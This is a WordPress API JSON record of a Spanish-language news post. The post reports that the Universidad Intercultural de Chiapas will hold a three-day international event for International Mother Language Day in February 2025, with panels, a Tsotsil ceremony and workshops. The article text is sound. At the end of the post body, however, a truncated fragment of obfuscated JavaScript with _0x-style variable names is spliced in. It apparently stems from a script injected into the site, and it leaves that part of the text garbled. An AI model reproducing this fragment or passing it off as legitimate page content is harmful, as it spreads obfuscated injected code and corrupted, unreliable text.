{"id":20474,"date":"2025-02-20T03:55:58","date_gmt":"2025-02-20T03:55:58","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20474"},"modified":"2025-02-20T03:55:59","modified_gmt":"2025-02-20T03:55:59","slug":"habra-evento-internacional-en-la-unich-con-motivo-al-dia-de-la-lengua-materna","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20474","title":{"rendered":"Habr\u00e1 evento internacional en la UNICH con motivo al D\u00eda de la Lengua Materna"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"724\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/WhatsApp-Image-2025-02-19-at-6.51.05-PM-724x1024.jpeg\" alt=\"\" class=\"wp-image-20475\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/WhatsApp-Image-2025-02-19-at-6.51.05-PM-724x1024.jpeg 724w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/WhatsApp-Image-2025-02-19-at-6.51.05-PM-212x300.jpeg 212w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/WhatsApp-Image-2025-02-19-at-6.51.05-PM-768x1086.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/WhatsApp-Image-2025-02-19-at-6.51.05-PM-1086x1536.jpeg 1086w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/WhatsApp-Image-2025-02-19-at-6.51.05-PM.jpeg 1131w\" sizes=\"auto, (max-width: 724px) 100vw, 724px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ Corresponsal<\/p>\n\n\n\n<p>19 de febrero del 2025. San Crist\u00f3bal de Las Casas.- El Rector de la Universidad Intercultural de Chiapas (UNICH), Dr. Javier L\u00f3pez S\u00e1nchez, anunci\u00f3 que los pr\u00f3ximos d\u00edas 21, 22 y 23 de febrero de 2025, se llevar\u00e1 a cabo un evento internacional en conmemoraci\u00f3n del D\u00eda Internacional de las Lenguas Maternas, con el objetivo de reflexionar sobre la importancia de preservar las lenguas originarias y promover su revitalizaci\u00f3n.<\/p>\n\n\n\n<p>&#8220;Vamos a tener un evento internacional en la UNICH con la participaci\u00f3n de invitados sabios de Guatemala, representantes de la Red de Universidades Unidas de Am\u00e9rica Latina y el Caribe, la Universidad de Ciencias y Artes de Chiapas (UNICACH), la UNACH, las universidades polit\u00e9cnicas, y la UNICH San Crist\u00f3bal. Se realizar\u00e1n paneles magistrales y debates, donde se discutir\u00e1 el valor de las lenguas ind\u00edgenas y su relaci\u00f3n con las culturas. Ser\u00e1 un espacio donde tanto expertos como estudiantes podr\u00e1n compartir sus ideas&#8221;, dijo.<\/p>\n\n\n\n<p>El evento arrancar\u00e1 el 21 de febrero con una ceremonia tradicional Tsotsil, a las 9 de la ma\u00f1ana y posteriormente mesas de discusi\u00f3n sobre temas fundamentales para la preservaci\u00f3n de las lenguas maternas, tales como La revitalizaci\u00f3n de las lenguas maternas en el derecho y la salud intercultural, Did\u00e1ctica y pedagog\u00eda de las lenguas, y Las lenguas ind\u00edgenas en la formaci\u00f3n universitaria y su impacto en la pr\u00e1ctica comunitaria. Adem\u00e1s, por la tarde se llevar\u00e1n a cabo diversas actividades art\u00edsticas que resaltar\u00e1n la riqueza cultural de las lenguas originarias.<\/p>\n\n\n\n<p>Durante los d\u00edas 22 y 23 de febrero, se realizar\u00e1 un taller reflexivo con la participaci\u00f3n de acad\u00e9micos locales e internacionales. Este taller se llevar\u00e1 a cabo en la Casa Intercultural del Pueblo UNICH, un espacio de intercambio de ideas y experiencias para continuar la discusi\u00f3n sobre c\u00f3mo las lenguas maternas influyen en la identidad cultural y en los procesos educativos.<\/p>\n\n\n\n<p>L\u00f3pez S\u00e1nchez subray\u00f3 que el prop\u00f3sito de este evento es generar un espacio de di\u00e1logo inclusivo, donde estudiantes y acad\u00e9micos de diferentes partes del mundo puedan compartir conocimientos, reflexionar sobre los desaf\u00edos actuales y fortalecer los esfuerzos para la preservaci\u00f3n de las lenguas ind\u00edgenas, cruciales para el fortalecimiento de la identidad cultural de los pueblos originarios.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ Corresponsal 19 de febrero del 2025. San Crist\u00f3bal de Las Casas.- El Rector de la Universidad Intercultural de Chiapas (UNICH), Dr. Javier L\u00f3pez S\u00e1nchez, anunci\u00f3 que los pr\u00f3ximos d\u00edas 21, 22 y 23 de febrero de 2025, se llevar\u00e1 a cabo un evento internacional en conmemoraci\u00f3n del D\u00eda Internacional de las Lenguas Maternas, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-20474","post","type-post","status-publish","format-standard","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20474","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20474"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20474\/revisions"}],"predecessor-version":[{"id":20476,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20474\/revisions\/20476"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20474"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20474"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20474"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}